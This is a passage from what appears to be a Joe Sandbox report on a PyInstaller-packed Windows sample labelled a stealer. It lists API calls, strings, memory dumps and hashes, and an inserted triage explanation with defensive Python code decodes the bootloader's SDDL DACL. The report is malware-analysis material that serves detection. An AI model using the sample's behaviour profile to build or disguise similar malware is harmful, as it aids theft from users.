                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                  • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction ID: 430de809b3fb511dda6bfa2792f7ff47d410db63dc1c24250cec4923645aa75c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4214F21A0874291E612BB10EC153EAA362FFA8790FE44435EA4D53BD6DF3CD805CB60
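The record above is bootloader code of this PyInstaller-packed sample, not payload logic: the `PYI_PATH_MAX` string (like the `[PYI-%d:ERROR]` and `Unhandled exception in script` strings in later records) belongs to the PyInstaller bootloader, and the chain GetCurrentProcess, OpenProcessToken, GetTokenInformation (twice, with GetLastError between the sizing call and the real one), ConvertSidToStringSidW and LocalFree turns the current user's SID into text and substitutes it into `D:(A;;FA;;;%s)(A;;FA;;;%s)` together with `S-1-3-4`, the OWNER RIGHTS SID. The result is a DACL granting full access only to that user and to the object's owner. When triaging, do not read this token enumeration as a privilege check by the stealer itself. The Python below is an added example, not code from the report or from PyInstaller: it rebuilds that SDDL string for a constructed user SID (`S-1-5-21-1000-2000-3000-1001`), parses DACL strings of that shape, and names every ACE that grants access to some other trustee. `SDDL_MAX_LEN` is an assumed stand-in for the bootloader's `PYI_PATH_MAX`, and the SDDL token tables cover only the subset needed here.

```python
"""Added example: decode the SDDL DACL strings built by the token/SID routine above."""
import re
from dataclasses import dataclass

# SDDL token subset: enough for DACLs of the shape on this page (not a full SDDL grammar).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED"}
RIGHTS = {"FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "FX": "FILE_GENERIC_EXECUTE", "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
          "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE"}
# Well-known trustee abbreviations (subset). OW is the alias of S-1-3-4, the OWNER RIGHTS SID.
ALIASES = {"WD": "S-1-1-0", "BU": "S-1-5-32-545", "BA": "S-1-5-32-544",
           "SY": "S-1-5-18", "OW": "S-1-3-4"}
OWNER_RIGHTS_SID = "S-1-3-4"
SDDL_MAX_LEN = 4096  # assumed stand-in for the bootloader's PYI_PATH_MAX bound
EXAMPLE_USER_SID = "S-1-5-21-1000-2000-3000-1001"  # constructed placeholder user SID

SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")
ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str
    rights: tuple
    trustee: str  # normalised to S-1-... form


def build_user_dacl(user_sid: str) -> str:
    """Same format string the record shows: FILE_ALL_ACCESS for the user and for OWNER RIGHTS."""
    sddl = "D:(A;;FA;;;%s)(A;;FA;;;%s)" % (user_sid, OWNER_RIGHTS_SID)
    if len(sddl) >= SDDL_MAX_LEN:  # the length check whose error string appears in the record
        raise ValueError("Security descriptor string length exceeds PYI_PATH_MAX!")
    return sddl


def decode_rights(field: str) -> tuple:
    """Rights are a hex mask or a run of two-letter abbreviations such as 'FRFW'."""
    if field.startswith("0x"):
        return ("0x%08x" % int(field, 16),)
    pairs = [field[i:i + 2] for i in range(0, len(field), 2)]
    unknown = [p for p in pairs if p not in RIGHTS]
    if len(field) % 2 or unknown:
        raise ValueError(f"unsupported rights field {field!r}")
    return tuple(RIGHTS[p] for p in pairs)


def parse_dacl(sddl: str) -> list:
    """Parse the D: component of an SDDL string (O:/G:/S: parts, if present, are skipped)."""
    start = sddl.find("D:")
    if start == -1:
        raise ValueError("no DACL (D:) component")
    body = sddl[start + 2:]
    sacl = body.find("S:")
    if sacl != -1:
        body = body[:sacl]
    first = body.find("(")
    if first == -1:  # "D:" or "D:P" with no ACEs: an empty DACL grants nothing
        return []
    aces = []
    for m in ACE_RE.finditer(body[first:]):
        fields = m.group(1).split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE ({m.group(1)})")
        ace_type, _flags, rights, _obj, _inh_obj, trustee = fields
        if ace_type not in ACE_TYPES:
            raise ValueError(f"unsupported ACE type {ace_type!r}")
        trustee = ALIASES.get(trustee, trustee)
        if not SID_RE.match(trustee):
            raise ValueError(f"unrecognised trustee {trustee!r}")
        aces.append(Ace(ACE_TYPES[ace_type], decode_rights(rights), trustee))
    return aces


def dacl_findings(sddl: str, user_sid: str) -> list:
    """Violations of 'private to user_sid': each extra trustee or deny ACE is named; [] means OK."""
    findings = []
    aces = parse_dacl(sddl)
    for ace in aces:
        if ace.ace_type == "ACCESS_DENIED":
            findings.append(f"deny ACE for {ace.trustee}")
        elif ace.trustee not in (user_sid, OWNER_RIGHTS_SID):
            findings.append(f"access granted to {ace.trustee}")
    if not any(a.ace_type == "ACCESS_ALLOWED" and a.trustee == user_sid for a in aces):
        findings.append(f"user {user_sid} is not granted access")
    return findings


if __name__ == "__main__":
    private = build_user_dacl(EXAMPLE_USER_SID)
    print(private, dacl_findings(private, EXAMPLE_USER_SID))
    print(dacl_findings("D:(A;;FA;;;WD)", EXAMPLE_USER_SID))
```

`dacl_findings` returns an empty list for the bootloader's own string and names each additional trustee otherwise, so the same check can be pointed at any SDDL string lifted from a report or from `(Get-Acl <path>).Sddl`; the owner and group prefixes and the SACL are skipped, only the `D:` component is judged. The explicit `S-1-3-4` ACE matters because, once an OWNER RIGHTS ACE is present, it defines what the object's owner gets instead of the implicit owner rights.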
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
• String ID:
• API String ID: 174288908-0
• Opcode ID: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
• Instruction ID: cfcf215a138ab426ed2addcdfb8a4ff2964db9795bd9705d0ae2d42327c1750e
• Opcode Fuzzy Hash: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
• Instruction Fuzzy Hash: EA216A61B0A642C1FA655B31E4C837D2398BF487B4F140275ED2E027E5DF3DD4268710
APIs
• GetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B35C
• SetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B377
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
• Instruction ID: b528dea49729ec2de321f3305e8fcd7e978b44b48f469b021a3813d14ec907ea
• Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
• Instruction Fuzzy Hash: 16118E24B0C243C2FA5A73215E5113DB163FFA47B0FA44738EA6E576D6DE2CA4415B21
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction ID: 1a293b21af12d5c7a05d2a9e3fd064be512ebb6b8f574076b13183a5b28a55a4
• Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction Fuzzy Hash: F131F662B1868152E721B761AC412E7A396FF987E4F900136EF8D83749EF3CD14ACA10
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
• Instruction ID: 292e865b91f1ef857576b84c42e0cea15a61e894af5280f7789b99ea8d095d60
• Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
• Instruction Fuzzy Hash: D031A472619A8284EB21EF21EC552FAB361FF99794F900135EA4E47B49DF3CD104CB10
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID:
• String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
• API String ID: 0-1751716127
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72C65918F,?,00007FF72C653C55), ref: 00007FF72C652BA0
• MessageBoxW.USER32 ref: 00007FF72C652C2A
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72C651B99), ref: 00007FF72C652760
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: getservbynamehtons
• String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
• API String ID: 3889749166-1257235949
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
• Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID: ]>mBD
• API String ID: 2933794660-976336857
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction ID: ae81148a40a3e58e71dc2da579647c5ac35ce6a7802ebd3fccee1782f7d5053d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0C82170870781EA15AB10EC4933AA371FF94770F940639CA6E455E4DF2CD48CCB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 966150261-0
                                                                                                                                                                                                                                  • Opcode ID: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                                  • Instruction ID: 0a597dd15bde6990c3a9899c0f304d8b1e7e08966d3fac1fc6738117f477314f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81512DF1E0B65282FA576F39DE141B822B6EF64F91B14A432CD4E86791DE3CA401DB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1671601251-0
                                                                                                                                                                                                                                  • Opcode ID: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                                  • Instruction ID: 746ca5b6013422503af9dcd8675d09551575b679644554ddc70a24be84626a4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8415FB1A0EA42C2EB664B34E8D437D73A8FF95B85F000071ED4E426A5DF2DE426C760
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction ID: c0fc834633b997149547d233c601b28d733ff1fad658722d3fa7980960768f62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF119632D58A0201FA567165EC9337990D3FF7C378E880E34E76E06AD58E6C9849CE20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3AF
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3CE
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3F6
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B407
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B418
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                  • Instruction ID: 50677f509f3fe0502c9133559968d4331df57f5656ab6f5dd6a059a279eaf794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9116330F0864381F95AB3665E51239B163FFA47B0FE44338E97D466CADE2CA4415A21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
